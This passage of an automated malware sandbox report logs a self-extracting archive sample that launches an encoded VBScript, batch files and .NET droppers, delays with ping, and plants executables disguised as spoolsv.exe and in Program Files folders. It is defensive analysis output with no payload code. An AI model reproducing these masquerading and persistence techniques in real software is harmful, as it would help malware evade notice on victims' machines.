                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\providerBrowserruntimeCrt\Providerbroker.exe "C:\providerBrowserruntimeCrt/Providerbroker.exe"Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: iconcodecservice.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: version.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: version.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exeJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\81eb946674e99fJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exeJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDirectory created: C:\Program Files\Common Files\81eb946674e99fJump to behavior
                                    Source: 9FwQYJSj4N.exeStatic file information: File size 10714393 > 1048576
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 9FwQYJSj4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 9FwQYJSj4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9FwQYJSj4N.exe
                                    Source: 9FwQYJSj4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 9FwQYJSj4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 9FwQYJSj4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 9FwQYJSj4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 9FwQYJSj4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeUnpacked PE file: 5.2.Providerbroker.exe.1260000.6.unpack
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeFile created: C:\providerBrowserruntimeCrt\__tmp_rar_sfx_access_check_3876921Jump to behavior
                                    Source: 9FwQYJSj4N.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101F640 push ecx; ret 0_2_0101F653
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101EB78 push eax; ret 0_2_0101EB96
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490E7AAA pushad ; retf 5_2_00007FF8490E7AAB
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490E6C30 pushad ; ret 5_2_00007FF8490E6C31
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490E6C8B pushad ; ret 5_2_00007FF8490E6C90
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490E60B0 push edi; retf 5_2_00007FF8490E60B6
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF84900C29C push esp; retn 0000h12_2_00007FF84900C29D
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF84900C114 push edx; retn 0000h12_2_00007FF84900C299
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF84900CFE4 pushfd ; iretd 12_2_00007FF84900CFE5
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF849177AAA pushad ; retf 12_2_00007FF849177AAB
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF849176C30 pushad ; ret 12_2_00007FF849176C31
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8491760B0 push edi; retf 12_2_00007FF8491760B6
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF849176C8A pushad ; ret 12_2_00007FF849176C90
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF84986794D push ebx; retf 12_2_00007FF84986796A

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Windows\PrintDialog\pris\spoolsv.exeJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\hgxdViOd.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\YuFVHGXq.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\rOQtFLTL.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\LVvPQgSP.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\oitSpyyv.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\IZCgKuwL.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\lWnUcfOW.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\zFRrKozb.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\uwXRiYty.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\VMyxesyD.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\jaztMisT.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\WsSnlWTv.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\STjOtvME.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\NkZFHznt.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Windows\PrintDialog\pris\spoolsv.exeJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\bnUEsCJp.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\QzpNJrOH.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\RRtweJUq.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\dpGmOlNk.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exeJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile created: C:\Users\user\Desktop\oVBKTOiM.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\gCMlaExJ.logJump to dropped file
